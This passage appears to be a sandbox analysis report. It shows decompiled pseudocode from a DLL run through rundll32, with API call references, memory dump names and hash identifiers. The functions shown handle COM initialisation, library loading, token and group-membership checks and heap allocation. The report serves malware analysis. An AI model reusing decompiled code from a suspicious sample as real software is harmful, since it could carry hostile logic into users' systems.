                                                                                                                                                                          					if(( *(_t24 + 0x1898) & 0x00010083) != 0) {
                                                                                                                                                                          						L13:
                                                                                                                                                                          						 *((intOrPtr*)(_t24 + 0xa4)) = _t60;
                                                                                                                                                                          						_t25 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          						__eflags =  *((intOrPtr*)(_t25 + 0x214)) - 3;
                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                          							goto L15;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							goto L14;
                                                                                                                                                                          						}
                                                                                                                                                                          					} else {
                                                                                                                                                                          						_t14 = _t24 + 0x224; // 0x10000000
                                                                                                                                                                          						_t54 =  *_t14;
                                                                                                                                                                          						_t29 = E1000A771( *_t14); // executed
                                                                                                                                                                          						__eflags = _t29;
                                                                                                                                                                          						_t24 =  *0x10020fd8; // 0x110fc50
                                                                                                                                                                          						_t50 = _t50;
                                                                                                                                                                          						if(_t29 == 0) {
                                                                                                                                                                          							goto L13;
                                                                                                                                                                          						} else {
                                                                                                                                                                          							__eflags =  *((intOrPtr*)(_t24 + 0x214)) - 3;
                                                                                                                                                                          							if( *((intOrPtr*)(_t24 + 0x214)) == 3) {
                                                                                                                                                                          								L14:
                                                                                                                                                                          								__eflags = E100029DD();
                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                          									L15:
                                                                                                                                                                          									E100012F8(_t50, _t54, __eflags, _t68);
                                                                                                                                                                          								}
                                                                                                                                                                          							}
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          					_t27 = 0;
                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					_t27 = _t22 + 1;
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t27;
                                                                                                                                                                          			}























                                                                                                                                                                          0x10001494
                                                                                                                                                                          0x10001498
                                                                                                                                                                          0x1000149f
                                                                                                                                                                          0x100014a7
                                                                                                                                                                          0x100014aa
                                                                                                                                                                          0x100014ab
                                                                                                                                                                          0x100014ab
                                                                                                                                                                          0x100014ae
                                                                                                                                                                          0x100014b1
                                                                                                                                                                          0x100014b1
                                                                                                                                                                          0x100014be
                                                                                                                                                                          0x100014c4
                                                                                                                                                                          0x100014c9
                                                                                                                                                                          0x100014d1
                                                                                                                                                                          0x100014e0
                                                                                                                                                                          0x100014e5
                                                                                                                                                                          0x100014ec
                                                                                                                                                                          0x100014ed
                                                                                                                                                                          0x100014ee
                                                                                                                                                                          0x100014f4
                                                                                                                                                                          0x100014fe
                                                                                                                                                                          0x10001504
                                                                                                                                                                          0x1000150e
                                                                                                                                                                          0x1000150f
                                                                                                                                                                          0x10001510
                                                                                                                                                                          0x10001510
                                                                                                                                                                          0x10001515
                                                                                                                                                                          0x1000151e
                                                                                                                                                                          0x10001525
                                                                                                                                                                          0x1000152a
                                                                                                                                                                          0x1000152d
                                                                                                                                                                          0x1000152d
                                                                                                                                                                          0x10001533
                                                                                                                                                                          0x10001547
                                                                                                                                                                          0x1000154c
                                                                                                                                                                          0x1000154e
                                                                                                                                                                          0x10001551
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10001558
                                                                                                                                                                          0x10001558
                                                                                                                                                                          0x10001564
                                                                                                                                                                          0x10001569
                                                                                                                                                                          0x1000156e
                                                                                                                                                                          0x10001570
                                                                                                                                                                          0x10001576
                                                                                                                                                                          0x1000157d
                                                                                                                                                                          0x1000157d
                                                                                                                                                                          0x1000157e
                                                                                                                                                                          0x1000157f
                                                                                                                                                                          0x10001589
                                                                                                                                                                          0x100015ac
                                                                                                                                                                          0x100015ac
                                                                                                                                                                          0x100015b2
                                                                                                                                                                          0x100015b7
                                                                                                                                                                          0x100015be
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000158b
                                                                                                                                                                          0x1000158b
                                                                                                                                                                          0x1000158b
                                                                                                                                                                          0x10001592
                                                                                                                                                                          0x10001597
                                                                                                                                                                          0x10001599
                                                                                                                                                                          0x1000159e
                                                                                                                                                                          0x1000159f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100015a1
                                                                                                                                                                          0x100015a1
                                                                                                                                                                          0x100015a8
                                                                                                                                                                          0x100015c0
                                                                                                                                                                          0x100015c5
                                                                                                                                                                          0x100015c7
                                                                                                                                                                          0x100015c9
                                                                                                                                                                          0x100015c9
                                                                                                                                                                          0x100015c9
                                                                                                                                                                          0x100015c7
                                                                                                                                                                          0x100015a8
                                                                                                                                                                          0x1000159f
                                                                                                                                                                          0x100015ce
                                                                                                                                                                          0x100015ce
                                                                                                                                                                          0x100014d3
                                                                                                                                                                          0x100014d3
                                                                                                                                                                          0x100014d3
                                                                                                                                                                          0x100015d3

                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000006,?,?,?,?,?,10001005), ref: 100014FE
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 10001558
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeSleep
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4203272843-0
                                                                                                                                                                          • Opcode ID: 333308f3e63272c52b4e1a8dad6883c0884dd541d24fb788ab2d30f0361769ad
                                                                                                                                                                          • Instruction ID: 9803195fefc7d3444036e0c450886d7b2dbb09160fb97233c97d75cf6d5bf9ef
                                                                                                                                                                          • Opcode Fuzzy Hash: 333308f3e63272c52b4e1a8dad6883c0884dd541d24fb788ab2d30f0361769ad
                                                                                                                                                                          • Instruction Fuzzy Hash: 6531E279640311EFF320DBA4DD8AEDA37E9EF457D1F110076F4029B596DA30E9428B60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 52%
                                                                                                                                                                          			E10009559(void* __edx, intOrPtr _a4) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                          				char _t5;
                                                                                                                                                                          				struct HINSTANCE__* _t7;
                                                                                                                                                                          				void* _t11;
                                                                                                                                                                          				void* _t13;
                                                                                                                                                                          				void* _t15;
                                                                                                                                                                          				void* _t23;
                                                                                                                                                                          				void* _t26;
                                                                                                                                                                          
                                                                                                                                                                          				_push(_t15);
                                                                                                                                                                          				_t23 = __edx;
                                                                                                                                                                          				_t13 = _t15;
                                                                                                                                                                          				_t5 = E10009192(_t15, _a4);
                                                                                                                                                                          				_t26 = 0;
                                                                                                                                                                          				_v8 = _t5;
                                                                                                                                                                          				_push(_t5);
                                                                                                                                                                          				if(_a4 != 0x26e) {
                                                                                                                                                                          					_t7 = LoadLibraryA(); // executed
                                                                                                                                                                          				} else {
                                                                                                                                                                          					_t7 = GetModuleHandleA();
                                                                                                                                                                          				}
                                                                                                                                                                          				if(_t7 != 0) {
                                                                                                                                                                          					_t11 = E1000950E(_t13, _t23, _t7); // executed
                                                                                                                                                                          					_t26 = _t11;
                                                                                                                                                                          				}
                                                                                                                                                                          				E10009E14( &_v8);
                                                                                                                                                                          				return _t26;
                                                                                                                                                                          			}












                                                                                                                                                                          0x1000955c
                                                                                                                                                                          0x10009563
                                                                                                                                                                          0x10009565
                                                                                                                                                                          0x10009567
                                                                                                                                                                          0x1000956d
                                                                                                                                                                          0x1000956f
                                                                                                                                                                          0x10009579
                                                                                                                                                                          0x1000957a
                                                                                                                                                                          0x10009589
                                                                                                                                                                          0x1000957c
                                                                                                                                                                          0x1000957c
                                                                                                                                                                          0x1000957c
                                                                                                                                                                          0x1000958d
                                                                                                                                                                          0x10009594
                                                                                                                                                                          0x1000959a
                                                                                                                                                                          0x1000959a
                                                                                                                                                                          0x100095a0
                                                                                                                                                                          0x100095ac

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,?,?,1001D870,?,100015E8,0000026E,1000149D,?,?,10001005), ref: 1000957C
                                                                                                                                                                          • LoadLibraryA.KERNELBASE(00000000,?,?,?,1001D870,?,100015E8,0000026E,1000149D,?,?,10001005), ref: 10009589
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4133054770-0
                                                                                                                                                                          • Opcode ID: 0382c1bbffe4b8fda4a867569fd0a7f9fbc685ac63ce8600953bd317ad0a4133
                                                                                                                                                                          • Instruction ID: 48a61f66a5c8936508bf55f1dd811003d18238d90fe045da648be771be27a9d8
                                                                                                                                                                          • Opcode Fuzzy Hash: 0382c1bbffe4b8fda4a867569fd0a7f9fbc685ac63ce8600953bd317ad0a4133
                                                                                                                                                                          • Instruction Fuzzy Hash: DEF08272704215ABFB15DFAADC4984FBBEDDB882E1721442AF405D7255ED70DD4087A0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E10001000() {
                                                                                                                                                                          				void* _t4;
                                                                                                                                                                          				void* _t5;
                                                                                                                                                                          
                                                                                                                                                                          				E10001494(_t4, _t5);
                                                                                                                                                                          				ExitProcess(0);
                                                                                                                                                                          			}





                                                                                                                                                                          0x10001000
                                                                                                                                                                          0x1000100c

                                                                                                                                                                          APIs
                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 1000100C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                          • Opcode ID: cec2f5bd529ec680ed129202333cce9e80438bb64279e13fb388e5d6baa6eabd
                                                                                                                                                                          • Instruction ID: 88ff7d305c733faf0802a1b78d92611ba7a1ab07d9a96955826befa5b791335c
                                                                                                                                                                          • Opcode Fuzzy Hash: cec2f5bd529ec680ed129202333cce9e80438bb64279e13fb388e5d6baa6eabd
                                                                                                                                                                          • Instruction Fuzzy Hash: 58B012303401408FFB40C770C949FAD33D0AB0C302F4948B0F109CE46BDA205002C710
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                          			E1000DD67(void* __ecx, void* __esi) {
                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                          				char _v12;
                                                                                                                                                                          				void* _v16;
                                                                                                                                                                          				char _v20;
                                                                                                                                                                          				char _v24;
                                                                                                                                                                          				short _v28;
                                                                                                                                                                          				char _v32;
                                                                                                                                                                          				void* _t20;
                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                          				intOrPtr* _t33;
                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                          				char _t37;
                                                                                                                                                                          				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                          				char _t45;
                                                                                                                                                                          				intOrPtr* _t48;
                                                                                                                                                                          
                                                                                                                                                                          				_t37 = 0;
                                                                                                                                                                          				_v28 = 0x500;
                                                                                                                                                                          				_t45 = 0;
                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                          				_t20 = E1000DC3C(__ecx);
                                                                                                                                                                          				_v16 = _t20;
                                                                                                                                                                          				if(_t20 != 0) {
                                                                                                                                                                          					_push( &_v24);
                                                                                                                                                                          					_t44 = 2;
                                                                                                                                                                          					_t21 = E1000DC93(_t44); // executed
                                                                                                                                                                          					_t48 = _t21;
                                                                                                                                                                          					_v20 = _t48;
                                                                                                                                                                          					if(_t48 == 0) {
                                                                                                                                                                          						L10:
                                                                                                                                                                          						FindCloseChangeNotification(_v16);
                                                                                                                                                                          						if(_t48 != 0) {
                                                                                                                                                                          							E10009203( &_v20, _t37);
                                                                                                                                                                          						}
                                                                                                                                                                          						return _t45;
                                                                                                                                                                          					}
                                                                                                                                                                          					_push( &_v12);
                                                                                                                                                                          					_push(0);
                                                                                                                                                                          					_push(0);
                                                                                                                                                                          					_push(0);
                                                                                                                                                                          					_push(0);
                                                                                                                                                                          					_push(0);
                                                                                                                                                                          					_push(0);
                                                                                                                                                                          					_push(0x220);
                                                                                                                                                                          					_push(0x20);
                                                                                                                                                                          					_push(2);
                                                                                                                                                                          					_push( &_v32);
                                                                                                                                                                          					_t29 =  *0x10020fc8; // 0x110fb00
                                                                                                                                                                          					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                          						goto L10;
                                                                                                                                                                          					}
                                                                                                                                                                          					if( *_t48 <= 0) {
                                                                                                                                                                          						L9:
                                                                                                                                                                          						_t31 =  *0x10020fc8; // 0x110fb00
                                                                                                                                                                          						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                          						_t37 = 0;
                                                                                                                                                                          						goto L10;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                          					_t33 = _t9;
                                                                                                                                                                          					_v8 = _t33;
                                                                                                                                                                          					while(1) {
                                                                                                                                                                          						_push(_v12);
                                                                                                                                                                          						_push( *_t33);
                                                                                                                                                                          						_t34 =  *0x10020fc8; // 0x110fb00
                                                                                                                                                                          						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                          							break;
                                                                                                                                                                          						}
                                                                                                                                                                          						_t37 = _t37 + 1;
                                                                                                                                                                          						_t33 = _v8 + 8;
                                                                                                                                                                          						_v8 = _t33;
                                                                                                                                                                          						if(_t37 <  *_t48) {
                                                                                                                                                                          							continue;
                                                                                                                                                                          						}
                                                                                                                                                                          						goto L9;
                                                                                                                                                                          					}
                                                                                                                                                                          					_t45 = 1;
                                                                                                                                                                          					goto L9;
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t20;
                                                                                                                                                                          			}




















                                                                                                                                                                          0x1000dd6e
                                                                                                                                                                          0x1000dd70
                                                                                                                                                                          0x1000dd77
                                                                                                                                                                          0x1000dd79
                                                                                                                                                                          0x1000dd7c
                                                                                                                                                                          0x1000dd81
                                                                                                                                                                          0x1000dd86
                                                                                                                                                                          0x1000dd90
                                                                                                                                                                          0x1000dd93
                                                                                                                                                                          0x1000dd96
                                                                                                                                                                          0x1000dd9b
                                                                                                                                                                          0x1000dd9d
                                                                                                                                                                          0x1000dda3
                                                                                                                                                                          0x1000de03
                                                                                                                                                                          0x1000de0b
                                                                                                                                                                          0x1000de11
                                                                                                                                                                          0x1000de18
                                                                                                                                                                          0x1000de1e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000de1f
                                                                                                                                                                          0x1000dda8
                                                                                                                                                                          0x1000dda9
                                                                                                                                                                          0x1000ddaa
                                                                                                                                                                          0x1000ddab
                                                                                                                                                                          0x1000ddac
                                                                                                                                                                          0x1000ddad
                                                                                                                                                                          0x1000ddae
                                                                                                                                                                          0x1000ddaf
                                                                                                                                                                          0x1000ddb4
                                                                                                                                                                          0x1000ddb6
                                                                                                                                                                          0x1000ddbb
                                                                                                                                                                          0x1000ddbc
                                                                                                                                                                          0x1000ddc6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ddca
                                                                                                                                                                          0x1000ddf6
                                                                                                                                                                          0x1000ddf6
                                                                                                                                                                          0x1000ddfe
                                                                                                                                                                          0x1000de01
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000de01
                                                                                                                                                                          0x1000ddcc
                                                                                                                                                                          0x1000ddcc
                                                                                                                                                                          0x1000ddcf
                                                                                                                                                                          0x1000ddd2
                                                                                                                                                                          0x1000ddd2
                                                                                                                                                                          0x1000ddd5
                                                                                                                                                                          0x1000ddd7
                                                                                                                                                                          0x1000dde1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000dde6
                                                                                                                                                                          0x1000dde7
                                                                                                                                                                          0x1000ddea
                                                                                                                                                                          0x1000ddef
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ddf1
                                                                                                                                                                          0x1000ddf5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x1000ddf5
                                                                                                                                                                          0x1000de24

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 1000DC3C: GetCurrentThread.KERNEL32 ref: 1000DC4F
                                                                                                                                                                            • Part of subcall function 1000DC3C: OpenThreadToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC56
                                                                                                                                                                            • Part of subcall function 1000DC3C: GetLastError.KERNEL32(?,?,1000DD81,00000000,10000000), ref: 1000DC5D
                                                                                                                                                                            • Part of subcall function 1000DC3C: OpenProcessToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC82
                                                                                                                                                                            • Part of subcall function 1000DC93: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000DD14,00000000,00000000,?,1000DD3D), ref: 1000DCAE
                                                                                                                                                                            • Part of subcall function 1000DC93: GetLastError.KERNEL32(?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCB5
                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000DE0B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1806447117-0
                                                                                                                                                                          • Opcode ID: 56904798abeccb8544c539b02390f786a53a8353cfb9a87c68c7168d800d003f
                                                                                                                                                                          • Instruction ID: 8ff03c18bb554401d2baa437731a5e089786e4630d4b8073f2d1e287e5300e86
                                                                                                                                                                          • Opcode Fuzzy Hash: 56904798abeccb8544c539b02390f786a53a8353cfb9a87c68c7168d800d003f
                                                                                                                                                                          • Instruction Fuzzy Hash: A0217F31A00209AFEB50EFA9DC85A9EBBF9EF48380B11407AE501E7155D770DA41CB60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1000DD17(void* __ecx) {
                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                          				void* _t13;
                                                                                                                                                                          				void* _t14;
                                                                                                                                                                          				void* _t17;
                                                                                                                                                                          				intOrPtr _t18;
                                                                                                                                                                          				void* _t23;
                                                                                                                                                                          
                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                          				_t12 =  *0x10020fc8; // 0x110fb00
                                                                                                                                                                          				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                          				if(_t13 != 0) {
                                                                                                                                                                          					_t14 = E1000DD00(); // executed
                                                                                                                                                                          					_t23 = _t14;
                                                                                                                                                                          					if(_t23 != 0) {
                                                                                                                                                                          						FindCloseChangeNotification(_v8);
                                                                                                                                                                          						_t17 = _t23;
                                                                                                                                                                          					} else {
                                                                                                                                                                          						if(_v8 != _t14) {
                                                                                                                                                                          							_t18 =  *0x10020fa0; // 0x110f8a0
                                                                                                                                                                          							 *((intOrPtr*)(_t18 + 0x34))(_v8);
                                                                                                                                                                          						}
                                                                                                                                                                          						_t17 = 0;
                                                                                                                                                                          					}
                                                                                                                                                                          					return _t17;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					return _t13;
                                                                                                                                                                          				}
                                                                                                                                                                          			}










                                                                                                                                                                          0x1000dd1b
                                                                                                                                                                          0x1000dd23
                                                                                                                                                                          0x1000dd2b
                                                                                                                                                                          0x1000dd30
                                                                                                                                                                          0x1000dd38
                                                                                                                                                                          0x1000dd3d
                                                                                                                                                                          0x1000dd41
                                                                                                                                                                          0x1000dd5f
                                                                                                                                                                          0x1000dd62
                                                                                                                                                                          0x1000dd43
                                                                                                                                                                          0x1000dd46
                                                                                                                                                                          0x1000dd48
                                                                                                                                                                          0x1000dd50
                                                                                                                                                                          0x1000dd50
                                                                                                                                                                          0x1000dd53
                                                                                                                                                                          0x1000dd53
                                                                                                                                                                          0x1000dd66
                                                                                                                                                                          0x1000dd33
                                                                                                                                                                          0x1000dd33
                                                                                                                                                                          0x1000dd33

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1c7633aba09c5c8b618301c764f3abddb75555302d0b8b6354e79d136d04f79b
                                                                                                                                                                          • Instruction ID: 58def36bf07d7f7111ecbabf11ee3a35f78c6fb920e0af07cff530f333468cf2
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c7633aba09c5c8b618301c764f3abddb75555302d0b8b6354e79d136d04f79b
                                                                                                                                                                          • Instruction Fuzzy Hash: CCF03A31A41215EFEB60EBA4DA45A8D77F8EB083C5F6500A6F501E7565D730DE00DBA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E100091E7(long _a4) {
                                                                                                                                                                          				void* _t2;
                                                                                                                                                                          				void* _t3;
                                                                                                                                                                          
                                                                                                                                                                          				_t2 =  *0x100210a8;
                                                                                                                                                                          				if(_t2 != 0) {
                                                                                                                                                                          					_t3 = RtlAllocateHeap(_t2, 8, _a4); // executed
                                                                                                                                                                          					return _t3;
                                                                                                                                                                          				} else {
                                                                                                                                                                          					return _t2;
                                                                                                                                                                          				}
                                                                                                                                                                          			}





                                                                                                                                                                          0x100091ea
                                                                                                                                                                          0x100091f1
                                                                                                                                                                          0x100091fb
                                                                                                                                                                          0x10009202
                                                                                                                                                                          0x100091f4
                                                                                                                                                                          0x100091f4
                                                                                                                                                                          0x100091f4

                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000008,?,?,10009D20,?,00000144,?,1001D870), ref: 100091FB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: a1724c618028bfcded9b80a66d06ee146d712e201a6a31212b0cff90572a81ef
                                                                                                                                                                          • Instruction ID: 342390e67e4f0fe4b4c842e576955cec4b9b0ba4bfb70e4c5827aed0232cbac9
                                                                                                                                                                          • Opcode Fuzzy Hash: a1724c618028bfcded9b80a66d06ee146d712e201a6a31212b0cff90572a81ef
                                                                                                                                                                          • Instruction Fuzzy Hash: E2C08C3128030DEBFB004BE8ACC8EE137EDAB48B86F008021F60C86010DB72F4905690
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E100091D2() {
                                                                                                                                                                          				void* _t1;
                                                                                                                                                                          
                                                                                                                                                                          				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                          				 *0x100210a8 = _t1;
                                                                                                                                                                          				return _t1;
                                                                                                                                                                          			}




                                                                                                                                                                          0x100091db
                                                                                                                                                                          0x100091e1
                                                                                                                                                                          0x100091e6

                                                                                                                                                                          APIs
                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00096000,00000000,10001030), ref: 100091DB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000010.00000002.576971579.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000010.00000002.576966567.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576987549.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.576994644.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000010.00000002.577000234.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                          • Opcode ID: 37b401eb958f48d282de142a9ffb26c8eb2c0351bd70c74a715d756c8d18baf3
                                                                                                                                                                          • Instruction ID: c582112d83fcd323f90af3847f647c21d19e36f3ca6bffefd4a97ee30eb31e67
                                                                                                                                                                          • Opcode Fuzzy Hash: 37b401eb958f48d282de142a9ffb26c8eb2c0351bd70c74a715d756c8d18baf3
